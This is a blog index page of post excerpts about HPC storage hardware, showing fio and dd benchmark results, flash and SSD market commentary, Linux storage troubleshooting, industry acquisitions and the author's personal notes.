I saw this initially on /., and it linked to PLoS. PLoS is a great system BTW, and I’d love to see Physics, Engineering, CS, and other things join in. arxiv.org serves a similar function (rapid publication) though it isn’t peer reviewed prior to publication, while PLoS is. Basically, this anti-viral appears to show excellent efficacy across multiple virus infections … everything from Dengue Fever to Rhinovirus (common cold). It would be wonderful if this technique would be active against retroviruses (HIV, etc.
Posts
then afterburners kicked in ...
… sumthin fierce … This could be (the) fastest 4U box on the market for streaming, which doesn’t use RAM for storage.
Run status group 0 (all jobs): READ: io=761904MB, aggrb=7455.4MB/s, minb=7634.3MB/s, maxb=7634.3MB/s, mint=102196msec, maxt=102196msec That streaming is more than 8x RAM size. No PCIe flash cards in the unit. None. Zero. Zilch. yeah BABY!!! Right now, running a random read of that data set. 8k random reads across the entire 700+ GB data.
Posts
Setting expectations for SSDs versus Flash
Nomenclature: SSD is a physical device that plugs into an electrical disk slot. Flash is a PCIe card. Both use the same underlying back end storage technology (flash chips of SLC, MLC, and related). I’ve had a while to do some testing with a large number of SSD units in a single device. I can give you a definite sense of what I’ve been observing. First: SSDs are, of course, fast for certain operations.
Posts
"Evolution" for Microsoft HPC
This is old news at this time, but Microsoft has moved its HPC group into their Cloud groups. I’ve talked in the past about critical business decisions that need to be addressed over time, as a business matures, and a product line is given time to sink or swim. At the end of the day, a business has to make hard decisions about what products to introduce, which to end-of-life, which to grow independently, which to fold into other initiatives.
Posts
heh ... good one !
“Scientists Trace Heat Wave To Massive Star At Center Of Solar System” See here
Posts
Not surprised ... IBM pulls plug on Blue Waters
I say I am not surprised for their reasoning … not that I had an inkling that they would do this before hand. Basically they pulled the plug because the costs were growing far faster than they planned, and they couldn’t afford to deliver the machine at the requested price. Which makes perfect sense to a business that has to consider profit and loss, but maybe not so much sense to research groups that want things.
Posts
Ever have one of them moments ...
… where you look at a technology and think to yourself … I need this. Just had that looking over MongoDB. I’ve spent the better part of a couple of weeks working on implementing a very poor mans version of this atop SQLite for one of our tools. And along comes MongoDB, and they solve the exact problem I am looking for. So, we are going to start implementing it on our units.
Posts
Rethinking RAID for SSDs
SSD units are fast, well, depending upon design, controller and other things. Sandforce units use a compression and overprovision technology to reduce write amplification. SSD units do writes, optimally, in erase block sizes. This suggests that your RAID chunk size should be a multiple of the erase block size. This is a good thing. The issue is that if you have a hardware RAID controller, you might think that the optimal way to handle this is to build a RAID5 or RAID6 atop this SSD pool.
Posts
OT: and on a happy personal note ...
… both my daughter and I were promoted to yon-kyu (green belt) in Isshinryu. Took me longer than I liked, but the specific kata we were learning was complex. Ok, it looks simple, but … it really … really … isn’t. There is great subtlety in it. Mastering this takes a while. The moves took me about a month. The rest took me much longer. Here is one of the style’s leadership (10th Dan) showing how to do this
Posts
PCIe Flash: Yeah, I think its here to stay
I’ve had some concerns over the business model for this. The price per GB is way … way out there for SLC. The use case for SLC vs MLC (especially with eMLC coming on line) is very similar. The cost of MLC is making these units affordable, and even considerable for people. There seem to be a consumer/hobbyist version and a professional class. The former has a bad performance rap from the first set of products.
Posts
Many happenings in HPC ...
I’ve been mostly heads down for the last month, very little time to work on posts. This is a good thing, as this has been mostly (new) business bits. We’ve got a range of new products we’ve been working on to address specific market segments, and have a number of nice new wins in a market segment we’ve been working on for a while. Working on more of course, and our core markets.
Posts
OT: This juxtaposition on Drudge ... I'm sure it was an accident ...
Its a Friday, I’ve had a tough week (caught pneumonia on the way home from NY, been recovering all this time). Hopefully this isn’t the meds talking below … Every now and then, there is inadvertent and unintentional humor in news. Well, the juxtapositions are humorous, even if the events are terrible. Think …. causality … below …
Obviously, violence isn’t a laughing matter. But that juxtaposition … with Jersey Shore immediately above it … doesn’t quite suggest it was … or wasn’t!
Posts
... and the day job turned 9 ...
… on Monday … Woo Hoo!!! What hasn’t killed us, has made us stronger … Or something like that. More correctly, the company was born 1-August-2002. Growing since inception. About to grow some more. No venture backing. During this time, we’ve worked on trying to convince people that accelerators would be important to HPC, back in 2004 time frame or so. Tried to raise capital, built business plans, got most of the details right.
Posts
Benchies: figuring out how to tune this thing ...
Design is good, but it looks like we are rate limited on the PCIe gen 2. 128GB read from a single name space. 8 simultaneous threads.
Run status group 0 (all jobs): READ: io=126984MB, aggrb=5285.8MB/s, minb=5412.6MB/s, maxb=5412.6MB/s, mint=24024msec, maxt=24024msec Yes, that is 5.3 GB/s. Still far south of what we can be doing, but I’ve verified that we are rate limited to ~2GB/s per RAID with other tests. This looks like a card issue.
Posts
Giddy ...
икониBenchies soon. Real soon. Should be a screamer … if we designed/built it right.
Posts
HPC in the cloud and cluster distributions
Many things are moving to cloud hosting … I won’t comment on being right or wrong about their moving … and HPC is one of them. This means that cluster distributions are going to follow … or could follow to some degree. Some cluster distributions focus upon packaging, some focus upon flexibility, some focus upon GUIs. All try to integrate some subset of needed tools. But all were effectively designed for a cluster computing model where some of the key/critical assumptions at the base of the distribution are simply not the case in the cloud, and due to the way they work, can’t easily be worked around.
Posts
Many reasons for not posting in the last two weeks
None of them bad. Too much work to get through (yes, that does mean new/existing orders). A vacation (long overdue, and yes, I was working though it as well). Back now … will be catching up soon with a set of posts in the next few days.
Posts
Color me amused ...
Every now and then recruiters call me. Want to see if I want the glamour of some new position somewhere. I run a very nice little, and growing company. I own a substantial fraction of this company. Our revenues are far more than the recruiter’s company is likely willing to pay. There are too many digits in our revenues, before the decimal point, relative to any likely salary. I am working extremely hard at increasing the number of digits.
Posts
Storm knocked out power for a while ...
Detroit Edison worked on it and got our office power up in 24 hours. Our house (where this server is located) … not so happy. Didn’t come back on until afternoon today. That was fun. [update] … and all the updating I’ve done has managed to bork the views counter. So its gonna look like we don’t get lots of traffic here. Will see if I can reconstruct this, but its a low priority item .
Posts
Scanning backing store for a cluster file system
Working on solving an issue for a customer. Wrote a backing store scanning tool for the job. Its gathering all manner of information and computing md5 sums. Right now it is single threaded, and as I am watching it run, it seems like I am using about 1/2 of the IO bandwidth (2 scans going at once on a machine). Will look at getting the scans going in parallel. Shouldn’t be hard (embarrassingly parallel problem).
Posts
Project relampago: coming to siClusters, JackRabbits, and DeltaV's near you ...
We’ve been working on some things, quietly, for a while. Almost … almost ready to talk about this. Should have something to show at SC11 this year certainly. Working on tuning. Maybe a character flaw on my part, but I am never happy with performance. More soon. I promise … (and yeah, been insanely busy, again).
Posts
Note to self: use the sparse switch when moving data around with tar
Using a tar pair to move data between two systems, over an NFS link. This is faster than over ssh (ssh isn’t a fast transport layer). Some user wrote a sparse file out. An 11PB sparse file. Which the tar happily … happily I tell you !!! was trying to copy, in its entirety, over to the backup unit. Happily. Took me a quick look to see what was going on.
Posts
Transformers ... shot in Michigan
This was nice. The original movie in the series was shot downtown Detroit. Or at least the scenes towards the end (when they are duking it out in the city). It was funny to see the old railroad terminal building being used as a chase scene. FWIW, that building would make one helluva nice data center. Just needs to be cleaned up, with lots of AC/power added. Right next to a rail-road right of way.
Posts
You win some, and you lose some
Just found out the day job lost a major storage upgrade to a competitor. Read over the evaluations, and we had some questions, sent them off to the purchasing folks. Its always annoying to lose. But from losing you can gain knowledge of why you lost and hone your offerings or your bidding … well … most of the time you can. Sometimes, the process is engineered for a particular outcome, due to an effective manipulation of rankings.
Posts
Updated DeltaV benchmarks, and a limited time discount offer
Somewhat better tuning on this unit now. This is getting … interesting. Very interesting. As a reminder, the day job’s lower cost storage target, the DeltaV is designed specifically to be a lower end machine. It is fast, and as we saw on the last set of numbers, it is actually faster than competitors hardware RAID. DeltaV does the RAID bits in software. So this is another (identical) unit to the one we tested before.
Posts
There is a clear and present need for meaningful metrics for HPC and storage
As the discussion of the amazing performance of the K machine continues, one needs to ask how well correlated the numbers are against end user realizable and likely performance. That is, how useful is top500 as an actual predictor of system performance for a particular task? Same question of Graph500, SPEC*, etc. ? How useful is Green500 at predicting power utilization and likely throughput of a specific design? Basically, I am not trying to minimize the efforts put into these.
Posts
OT: Fun week ahead
This is a personal bit. I am going up for belt promotion in Karate this Thursday. Huge risk saying something in advance in case I don’t make it. I am not worried about most of it. The fighting portion, yeah, a bit. I’m fine in sparring bouts, but this promises to be at least 7 fresh opponents, one after the other, with no rest for me. 2 minutes each opponent, and they run them from low to higher rank (the opponents get tougher at the end).
Posts
"K" is atop the top500. What does this mean to us?
Not much. No, I am not trying to be a downer. The relation of the top500 top-o-the-heap to mere mortals with hard problems to solve isn’t very strong. Actually its quite weak. There is only one K machine. Its at RIKEN in Japan. There’s only one Jaguar, and only one Tihane machine. All are, to some degree or the other, unique in some aspects. What matters to most people is “what can it do for me”?
Posts
Updated DeltaV in the lab
Should be a pretty good performance bump for the unit. Processor and memory bump. Newer backplane. Some other bits. Will update soon. Really looking forward to the benchies :) [Update 1] Very encouraging sign: RAID build is occurring at about 2x the rate of the previous generation. Should be done with 48TB RAID build in about 7 more hours. The comparison to the hardware accelerated RAID should be made as well.
Posts
One of the best compilers out there goes open source
Pathscale makes some of the best C/C++/Fortran compilers on the market. And now, they are open source. Grab the bits while they are hot!
Posts
Shakes head ...
Them: Here is our parts list. We found it by going to these web sites (see long list) finding the lowest cost among them, and then adding it in to the spec. Me: Uh huh (noting the several conflicting and wrong elements). So what is it you are trying to do … Them: Never mind that, this is our new machine, and it will do X … [n.b. X is some magical realization of performance at the 99th percentile of the systems capability … only would hit that if everything, and I mean EVERYTHING, was perfect.
Posts
Fusion IO IPO tomorrow ... is the market for PCIe Flash strong enough to support 1 or more companies?
FusionIO goes public tomorrow. If you are an early employee, chances are, you are going to be a millionaire by the end of the day, at least on paper. The author of the great “fio” tool works there, and I hope this does work out for him and the rest of them well. But … my question is a longer term one. Does the market … or will the market … support a higher cost PCIe channel flash as opposed to lower cost SSD based units?
Posts
How to channel bond in Linux
Partner wants a 4 way bond on their unit. No problem.
[root@jr4-1 ~]# /opt/scalable/sbin/mkchbond.pl --bond=bond0 --eth=eth0,eth1,eth2,eth3 --ip=10.100.243.80 --netmask=255.255.0.0 --mode=0 --write mkchbond.pl: v0.9 Create channel bonds easily by Joe Landman (http://scalableinformatics.com) This software is Copyright (c) 2005-2007 by Scalable Informatics and licensed under GPL v2.0 only. You may freely distribute this software under the terms and conditions of the GPL 2.0 license. You may not alter, remove, or prevent printing of the copyright notice and information.
Posts
Disappointed, but, I guess, not surprised
Several years ago, we had an academic customer literally steal our time, our effort, our design, etc. for their system. The signals were there, and we didn’t pay attention to them. Something like that happened again, though this time we recognized it. Customer still is operating off the assumption that they got something for nothing, but … well … when they put their system together, discover that it doesn’t work, I expect a few probing emails.
Posts
Why do companies erect unneeded barriers?
This is about the business side, and AMEX in particular. A customer bought something. Paid for it on AMEX. We use Authorize.Net, as do many people. It handles the card processing for us. Makes our life easy. But it doesn’t do AMEX directly, AMEX does AMEX. And they don’t play well with Authorize.Net. So now we are in the position of having to decline this AMEX transaction, and remove AMEX from our accepted card list, because AMEX is more interested in wasting my time and erecting barriers to doing business, than actually doing business.
Posts
What are xfs's real limits?
Over at Enterprise Storage Forum, Henry Newman and Jeff Layton started a conversation that needs to be shared. This is a very good article. In it, they reproduced a table comparing file systems coming from this page at Redhat. This is really showing a comparison of what the “limits” are in a theoretical or practical sense between the various versions of RHEL platforms. The file system table compares what you can do in each version.
Posts
Working on a few new things ...
ok, some of these are riffs on our older things, but they are very exciting to everyone we speak with. Need a chassis mod for one of them. The other is … well … an extension of an earlier idea. Been doing some testing with it, and its working out far better than I had thought. Sorry for being so vague. I don’t want to let these cats out of the bag … yet икони
Posts
OT: been very busy ...
Good version of busy; lots of quotes, orders, builds, …. A new market has emerged for us, one I wasn’t sure how to break into, that looks like it is going to do good things for us. Entrenched expensive and slow competitor, everyone looking for better systems. Should be interesting coupla months. I hope I get time for a vacation in there somewhere.
Posts
OT: Just played with Google Docs ...
Wow … uploaded a presentation I was working on for a customer and it worked well. Rendered everything correctly (OpenOffice doesn’t always do that). Anyone else using Google Docs on a more or less professional/constant basis? Any outage issues? Compatibility issues? I like OpenOffice, but its occasional glitches and … er … interpretive re-renderings of Powerpoints are … er … amusing. The downside to Google docs are storage offsite, privacy/security issues, and access in the event of a network outage.
Posts
OT: heh ... nice to see people resuming a healthy skepticism
See here . money quote
My gosh … a follow the money mystery? Who woulda thunk it? At any rate, its good to see people resume the healthy skepticism that is needed for real scientific inquiry and advancement. Science is never settled, and anyone telling you otherwise is trying to sell you something. Sure enough, some of those doing the selling have a strong economic incentive for doing so. Go figure.
Posts
... and Sandisk swallows Pliant ...
This is interesting. SANdisk now has an enterprise play. Flash is getting more interesting. Basically creating the same sort of sea change in storage that GPUs created in computing.
Posts
Still struggling with half-open and otherwise broken drivers
We have a nice pair of Qlogic 7220 DDR HCAs in house. Direct connecting a pair of machines for a simple point to point bit. Using our updated 2.6.32.39.scalable kernel. Want to set up SRP target. So we have to get OFED compiled. Need 1.5.3+ due to their … er … issues tracking kernels. Basically the OFED build process is an abuse … a very severe one … of the RPM process.
Posts
Updated JackRabbit JR5 results
Lab machine, updated RAID system (to our current shipping specs). We’ve got a 10GbE and an IB DDR card in there for some end user lab tests over the next 2 weeks. We just finished rebuilding the RAID unit, and I wanted a baseline measurement. So a fast write then read (uncached of course).
[root@jr5-lab fio]# fio sw.fio ... Run status group 0 (all jobs): WRITE: io=195864MB, aggrb=3789.1MB/s, minb=3880.1MB/s, maxb=3880.1MB/s, mint=51680msec, maxt=51680msec Thats the write.
Posts
IT storage
They see a shiny new storage chassis with 6G backplane. They fill it with “fast” drives, and build “raids” using integrated RAID platforms. They insist it should be fast, showing calculations that suggest that it should sustain near theoretical max performance on IO. Yet, the reality is that its 1/10th to 1/20th the theoretical max performance. Whats going on? In the past, I’ve railed against “IT clusters” … basically clusters designed, built, and operated by IT staff unfamiliar with how HPC systems worked.
Posts
Unbelievable
A system designed to fail often will. Seen this a few times this past week. In one case, someone agrees that we we do and our machines have value, but want our stuff without paying us for our stuff. They don’t want to buy them. They just want us to tell them how to build them. They don’t want to buy our stuff, even though we’ve demonstrated that our systems solve their problem.
Posts
Interesting acquisition: STEC takes KQ Infotech (assets)
I wasn’t expecting this one. KQ Infotech, a smaller development house probably best known for their porting of ZFS to Linux, and providing the tools required for end users to build their own ZFS on their own machines (thus getting around some of the major hurdles with GPL and CDDL licenses). I was not expecting this, though to be honest, we’ve seen some pretty interesting M&A; bits over the last 2-4 weeks.
Posts
Ok, this is just showing off now ...
One of the two units we are going to ship to a customer very soon. Running the 19.2TB write. Fill up 1/2 the system. With a single file. Of 19.2TB size. In less than 2 hours. Don’t try this on ext*.
[root@jr5-1 ~]# fio sw-19.2TB.fio ... Run status group 0 (all jobs): WRITE: io=19200GB, aggrb=3160.7MB/s, minb=3235.1MB/s, maxb=3235.1MB/s, mint=6221566msec, maxt=6221566msec [root@jr5-1 ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/md0 44G 5.
Posts
Raw, unapologetic, firepower
96TB Scalable Informatics JackRabbit JR5 unit, shipping out to a customer today (or early tomorrow). These are single thread, single process, single file writes. Taking it out to the track and cracking the throttle, wide open.
[root@jr5-2 ~]# fio sw.fio ... Run status group 0 (all jobs): WRITE: io=65028MB, aggrb=3801.1MB/s, minb=3893.2MB/s, maxb=3893.2MB/s, mint=17104msec, maxt=17104msec [root@jr5-2 ~]# fio sr.fio ... Run status group 0 (all jobs): READ: io=65028MB, aggrb=3257.2MB/s, minb=3335.3MB/s, maxb=3335.3MB/s, mint=19965msec, maxt=19965msec and the 1TB run
Posts
... and Seagate snarfs up Samsung's drive business ...
Looks like Seagate got itself some spinpoints. Seagate may be leveraging this to build its way into the Chinese market more than it is. Now there are 3 big spinning rust makers: Seagate, Western Digital, and Toshiba. A Seagate-Toshiba hookup wouldn’t surprise me, though the regulators are likely to start eyeing this stuff more closely for anti-monopoly reasons. I’ve said more M&A; and I mean’t more M&A.; And the deals ain’t done yet.
Posts
Ignore the spork behind the curtain ...
At InsideHPC, Rich notes in a post
Heh … I’d argue that the (sp)fork already happened, its in the past, and people have decided to continue moving forward with the new (sp)fork. This said, this is decidedly not a bad thing. As I had predicted, Oracle has largely abandoned all things HPC that it couldn’t remission for some other decidedly non-HPC purpose. The only realistic reason for retaining ownership of the Lustre IP/copyrights/etc.
Posts
file system surgery on borked Lustre volumes
So whatcha gonna do when you have a Lustre file system, with an ext4 backing store with a journal on an external RAID1 SSD, when that external RAID1 ssd pair goes away (in a non-recoverable manner), and the file system has the needs_recovery flag set? You see, the ‘-f’ option to e2fsck … doesn’t … in the face of a missing external journal with needs_recovery set. Ok, you can turn off the journal.
Posts
On the broken-ness of most Linux distributions ...
If you have anything approaching a complex installation or management requirement for your systems, most … no … pretty much all Linux distributions have anywhere between somewhat borked to completely boneheaded designs for handling these complex sitatuations. Say, for example, you want to boot a diskless NFS system, and replicate it. Diskless NFS is well known to be an easy to manage scenario … one system to manage, very scalable from an admin point of view.
Posts
At NAB in Las Vegas ... in a word ... wow!!!
I’ve got a much longer writeup in mind. Those who attend SCxx and think its big … er … no. Conservative guess that NAB is 5x the size of SCxx in terms of exhibit floor space. This may be an under estimate by 2-4x BTW, I’ve only visited the upper and lower south exhibit hall areas. Not the central or north exhibit halls. And, to add insult to injury … the entire SCxx floor would fit in 1/2 of one of the upper or lower floor levels.
Posts
Another test case on a 5U JackRabbit
This is the other 5U JackRabbit unit we are building for the customer. Single thread read of an large file, no caching. This is spinning rust (e.g. hard disk). This uses 2TB drives while the other unit uses 1TB drives. The theoretical maximum we could pull data off these units the way they are arranged now is 4.68 GB/s with these particular drives.
[root@jr5-2 ~]# dd of=/dev/null if=/data/big.file ... 1024+0 records in 1024+0 records out 137438953472 bytes (137 GB) copied, 29.
Posts
Not all clouds have silver linings ...
AaaS/StaaS (Archive as a service, Storage as a service) seems to have providers dropping their offerings as they are not very profitable. As with computing as a service, the issues are costs, pure and simple. For this to work well as a service, you, the provider, need your costs to be well below what you charge your customers. Moreover, the cost you charge your customers needs to be below their entire burdened costs for replicating the same thing in house.
Posts
The TB sprint ... 12.4 TB/hour write speed
канализацияWe wanted to see what one of the current gen machines could do for writing and reading a 1TB (1000GB) sized file. So we set up a simple fio deck to do this. Then ran it.
Run status group 0 (all jobs): WRITE: io=999.78GB, aggrb=3535.7MB/s, minb=3620.6MB/s, maxb=3620.6MB/s, mint=289552msec, maxt=289552msec The write took 289.6 seconds. Less than 5 minutes, or 12.4 TB/hour write speed. The read
Run status group 0 (all jobs): READ: io=999.
Posts
Now thats what I'm talking about ...
New JackRabbit JR5 in lab (actually a pair of them) being built for a customer. Running some real simple baseline tests. Very simple stuff. RAID6. dd.
[root@jr5-1 ~]# dd if=/dev/zero of=/data/big.file ... 1250+0 records in 1250+0 records out 83886080000 bytes (84 GB) copied, 26.4774 seconds, 3.2 GB/s and a quicky-dirty fio run …
Run status group 0 (all jobs): WRITE: io=128004MB, aggrb=3336.4MB/s, minb=3416.4MB/s, maxb=3416.4MB/s, mint=38367msec, maxt=38367msec and the read version
Posts
Day job at 2011 High Performance Computing Linux Financial Markets on Monday 4-April
We will be there, with 2 machines in a booth with our partner JRTI/XCT. We are featuring Flash hardware from Virident and showing a demo (or set of demos) on very high performance data analysis using kdb+ Scalable gear will include a JackRabbit JR4 unit with 2x Virident TachIOn cards (think drool-worthy 1GB/s 300k IOP cards … ). Everything in the JR4 is new, apart from the disks … which are older/slower (what we had on hand).
Posts
Pot ... kettle ... yeah, something like this
I think this news story is a day early. It has all the requisite gems in it.
My gosh, for a moment, I thought Microsoft was talking about itself in the PC market. Then I saw the words “Google” and “e-book”. Now if we changed those to “Microsoft” and “PC”, yeah, that statement would also be true. Are we sure this isn’t the first of April?
Posts
Something we are working on
Ignore some of the ugly table bits to the left. Still working on the screen layout, menu look/feel, etc. But you can get a sense of what we are doing. This will appear at the HPC Linux on Wall Street show with us next week, as we will be running demos from this (and showing to a few prospective partners/customers at NAB in Las Vegas). Please feel free to stop by if you are in NYC for the show … Many of the functions are not fully hooked to the controllers yet, but you will get the idea.
Posts
Hilarious startup robot pitches a VC ...
As seen on InsideHPC in a post
Ok … a long time ago I posted a somewhat silly post, briefly lampooning the VC’s penchants for crowd-funding ideas that were buzzword heavy (and, ahem … value-lite … ahem), whilst ignoring real innovation, real markets, real companies. This video does a similar type of lampooning, and it is, sadly, on the money. If we were pitching the day job as a “Social network, and crowd source content and media data repository” rather than as a “high performance storage and computing solutions” company … yeah … chances are we’d get much more interest from that community.
Posts
Oracle dumps Itanic
You can sort of see this coming. Oracle is ditching Itanium development, effective immediately. If they haven’t done so for Power … yet … I’d expect this soon as well. Oracles' claim is that Intel is ditching Itanium. Well, yeah, its sort of a weak argument. The future of Intel isn’t much on the Itanium side of things. x86 and derivatives appear to be their future, but Itanium isn’t being deep sixed now.
Posts
Parts shortages
We’ve noticed this over the past week. Have a number of new orders, and suddenly, memory is hard to find. And prices have jumped dramatically. From /.
We do just-in-time builds, we tend to keep inventory down. Global supply and demand folks, the economy is operating as it should. When you have shortages, pricing rises through channel to market. There is little we can do about this. We have some memory supply (the parts giving us issues now), and CPUs aren’t a problem.
Posts
OT: Darned caffeine containment leak ...
on my desk. Quick thinking Doug managed to help me avoid a tragedy of epic proportions (completely covering my desk with coffee) by application of the caffeine leak containment device (e.g. towel). No pictures of this tragedy, and it was unrelated to any earthquakes. It was related to the klutz whose left hand was near the coffee and moved it like this … DO’H!
Posts
What should 432TB of storage cost?
This is close to 1/2 PB. Assume you are building a very fast storage unit and backup system. What should this cost? Yeah, we can argue about cost per GB/s and cost per IOP/s. Assume 3GB/s, and 10k IOPs. Assume the unit is 144TB raw (108TB usable) primary fast storage, and 288TB raw (216TB usable) storage. There is a poll for this post, but you have to click the title to be able to participate.
Posts
Day job PR on a new accelerated cluster at Stanford
See InsideHPC for the scoop. PRWeb stuff here. Will have it up on our site soon. This uses the XCT chassis, which lets us use C20x0 Fermi, as well as other PCIe cards (can you say Virident Flash? ) The system will be using Bright Computing’s excellent Cluster Management tool. We will take pictures/movies during assembly and installation. Should be fun! About 15TF, 100x Fermi units, 96TB storage. Excellent design overall (pats himself on the back), and a major win for our partner JRTI and us, validating our strategic partnership.
Posts
Not good
The earthquake, tsunami and its after effects are terrible enough. Our thoughts are with the people of Japan (we have quite a few readers there). The US Red Cross has setup to take donations for relief work there if you are inclined to go that route. If you are in Japan, and have alternative suggestions as to how we all can help, please do post them. One of the after effects of this event was a destabilization of a boiling water reactor.
Posts
Deskside box with lotsa GPUs
Testing this for a partner. A Pegasus deskside supercomputer with 12x X5690 CPU cores, 48 GB RAM, 500 MB/s IO channel (soon to 1 GB/s), and a GTX 260 graphics card. Connected to an XCT a-Brix 2U unit with 4x NVidia Fermi C2050’s (normally we’d use a JackRabbit unit, but they are all busy with customer projects right now). First, lets see whats there:
[root@pegasus C]# lspci | grep nVidia | grep VGA 06:00.
Posts
... and NetApp buys Engenio ...
[updated] Ok, this one is huge. Many of the higher end storage folks in the HPC world use this hardware. Which NetApp will now own. NetApp is not an HPC storage vendor, and I don’t think they have designs to be one [update] yes they do! But this goes to Cray, SGI, Oracle, Dell, IBM, HP, and many others (DDN, Bluearc, Terascala, etc.) who do use Engenio. We don’t use it, so its really not an issue to us.
Posts
when failures stick out like a statistical sore thumb
Parts fail. Components fail. You have to operate assuming they will fail. A warranty is fundamentally a bet that parts will fail, and a willingness to place money (the price of the warranty) on that bet. Over time, with enough components, you get a feel for how often parts fail. You get historical data. When one subset of components have a high failure rate (e.g. Corsair SSD disks), you know you can isolate the problem.
Posts
Single vs Multi-stream on JackRabbit JR5
A customer was playing with one of our lab machines (a JackRabbit JR5), and asked us if we could improve the multithread streaming performance. The way we had it set up (for internal testing) was non-optimal for their use case. So we went back and did some simple tweaks. Somewhat better optimized for their use case. Remember, this is our previous generation unit. Next gen is … a little faster :)
Posts
... and Hitachi GST is eaten by ... WD ...
Hitachi, whose drives we do like, was just eaten by WD, whose drives we run away from. Story here. As long as the product lines that get ditched are the WD’s in favor of the Hitachi’s, I am ok with this. 2TB drives that decide to randomly power down in a RAID, without informing anyone? And a company that seems to want us all to believe that there are no firmware updates?
Posts
BTW: had an iPhone-ish meltdown
took all my contact data with it … so … if you happen to want me to contact you, gotta give me some numbers to reach you at. Private email me at joe@scalability.org and I’ll re-enter it (and store it somewhere else). Yeah, mobile device backup? Pretty darned important? Me? A fool for not doing this regularly.
Posts
I can't believe I forgot to update this
Day job storage unit has increased density. JackRabbit JR2 tops out at 36TB now, JackRabbit JR3 tops out at 48TB, JackRabbit JR4 tops out at 72TB, and JackRabbit JR4 tops out at 144TB. 8 of the latter can go into a 42U rack, and get you 1.1PB of insanely fast storage. Our measured bandwidths are also quite good. JR4’s are demonstrating sustained 2+GB/s. JR5’s … well :) DeltaV units of similar size specs.
Posts
Quick accounting tool for Torque
A long while ago, I had developed a usage summary tool for gridengine. For our small internal cluster, we are using Torque (we set it up just as thedejecta was hitting the high rotational rate elements w.r.t. gridengine at Oracle, link URL may not be safe for work, and you might be offended by it … if so, I apologize.). This summary tool was a quick way to parse the accounting records.
Posts
Members of Rocks core team moving to Rocks startup
Rocks, as folks might know is a cluster distribution based upon Redhat/Centos. This brings in all sort of issues on its own, but Rocks attempts to work around this and knead the distribution and associated tools into a cogent form, for simple cluster setup. The core team consisted of the project lead, several developers and a number of others directly or loosely affiliated with the group. Two members, Dr. Greg Bruno, and Mason Katz, just left to join Clustercorp, who make the commercial version, Rocks+.
Posts
Plus ca change, plus c'est la meme chose
The more things change, the more they stay the same. My former employer (left on good terms, between layoffs a decade ago next month) SGI has layoffs coming. This is a tough environment folks, a very tough environment. We pulled out a nearly 12% revenue growth in it. SGI posted a profit, but if you click through to the underlying article (hit InsideHPC first though), you see some interesting analysis. First on the size of the layoff.
Posts
The spork gains support
This is goodness. Really. Peter Jones just sent out an email to the Lustre Discuss list, and it covers much of what i was hoping to see. Process ownership, agreement around the release for 2.1, central tracker, and build info. Yeah, its probably not the optimal outcome, but its a better place than we were a week or more ago. And that was still better than a month or two ago.
Posts
Interesting FUD floating about
One of our competitors, having been recently purchased by a very large storage company, seems to be telling some customers that they replaced an infrastructure that we sold to to a large supercomputer center in the northern midwest. Curious, I hadn’t heard of this. Last I checked (a few minutes ago), the infrastructure was still in use. Moreover, they said “they” replaced GlusterFS on the system. Again … curious, as I don’t quite remember them on the con-calls.
Posts
Cloudy expectations for HPC
I’ve mentioned in the past, where users expectations deviated, often wildly, from the reality of a system. The reason for these deviations of expectations could be internal (convincing yourself that “instant” means, literally, “instant”), external (believing marketing blurbs), or some factor between the two. At HPCinthecloud, an article on a user running head first into the reality of cloud computing, and avoiding the hype. Ok, a number of critical take-aways. One is that end user expectations can be wildly … badly … out of sync with reality.
Posts
We need to get better at weather forecasting
Big HPC area. Yesterday, all the forecast models had us getting ~1.5 inches (about 4cm) of snow with rain/ice afterwords. We got (locally by me) 12+ inches (30+cm). Ok. I don’t mind if there are large error bars. Really I don’t. But this ? I don’t know enough about the models to be able to say anything terribly intelligent about their intrinsic accuracy, or if the omit anything, under/over predict anything … I do know enough to say that they weren’t in the same ballpark as what we got.
Posts
Need to look at MooseFS
Looks similar to a number of others, but whats interesting is that it keeps its metadata in RAM. How much of an impact that provides for updates depends upon the efficiency of the network stack, and how much security it provides depends upon its ability to recover from unplanned outages … that is, it can’t just run in ram an occasionally update something on disk. Gotta look at this more though, as it could be interesting as a front end FS to something else on the backend.
Posts
Old model JackRabbit 5U bonnie++
Previous version of our JR5 unit, in the lab as a test bed for customers. Testing firmware and driver updates, among other things. Simple bonnie++ 1.96 run. You know I am not a huge fan of this as a load generator, or as a benchmark. Regardless, here is the output:
[root@jr5-lab ~]# bonnie++ -u root -d /data -s 144g:1024k -f Using uid:0, gid:0. Writing intelligently...done Rewriting... done Reading intelligently...done start 'em.
Posts
RFPs that request a pony
Yeah, I have one of those in front of me now. The requirements are for all intents and purposes, impossible to simultaneously satisfy. Q&A; response from customer suggests that they may be willing to compromise some aspects, but not enough to actually satisfy their request. Sort of like “I want 1 PB … for free, with free lifetime 24x7 support, … , infinite bandwidth, infinite snapshots, infinite IOPs. And I want a pony.
Posts
Pushing atoms versus pushing bits
Cloud computing is driving a disruptive change through a number of market places. It started long before virtualization, but virtualization really enabled much of what we have now. Remember, at the end of the day, the entire process is economic in nature. Cost per cycle does matter. When a vendor sells hardware, they are selling all the cycles of that hardware over the usable lifetime of the hardware. They push the atoms at the customer, and let the customer manage the economics of utilization.
Posts
Storage bandwidth wall writ large
Henry Newman, CEO/CTO of Instrumental, has a great article on Enterprise Storage Forum. Remember, what we call the storage bandwidth wall, e.g. the time in seconds to read/write your disk, is your capacity divided by your bandwidth to read/write that capacity. Its a height, measured in seconds, to take one pass through your data. If you can read/write at 1GB/s and have 1TB of data, your wall height is 1000GB/(1 GB/s) = 1000s.
Posts
More code golf: "grid" computing
I told you I was an addict. Problem statement is here.
And you want to do it in the minimum number of characters (e.g. golf strokes) in your programming language. They give an example matrix, and their result (which is correct). So … what can you do for this? I used two languages: Octave/Matlab and Perl. The former is more of a ‘modeling’ language with formal programming bits atop it, and the latter is a classical programming language, quite notorious for its ability to be terse.
Posts
JackRabbit updates for greater density
JR4 units with up to 72 TB per 4U, at our nice sustained 2+ GB/s data rates. JR5 units with up to 144 TB per 5U at 2.5+ GB/s data rates. You can order our systems with these units. Thats 720TB/rack of JR4’s with 20+ GB/s sustained, or 1152TB per rack of JR5’s with 20 GB/s sustained. Built into our siCluster units, they represent some of the fastest and most cost effective hardware to build storage, storage clusters, storage clouds, and so on.
Posts
Sometimes you get the bear ... other times, the bear gets you
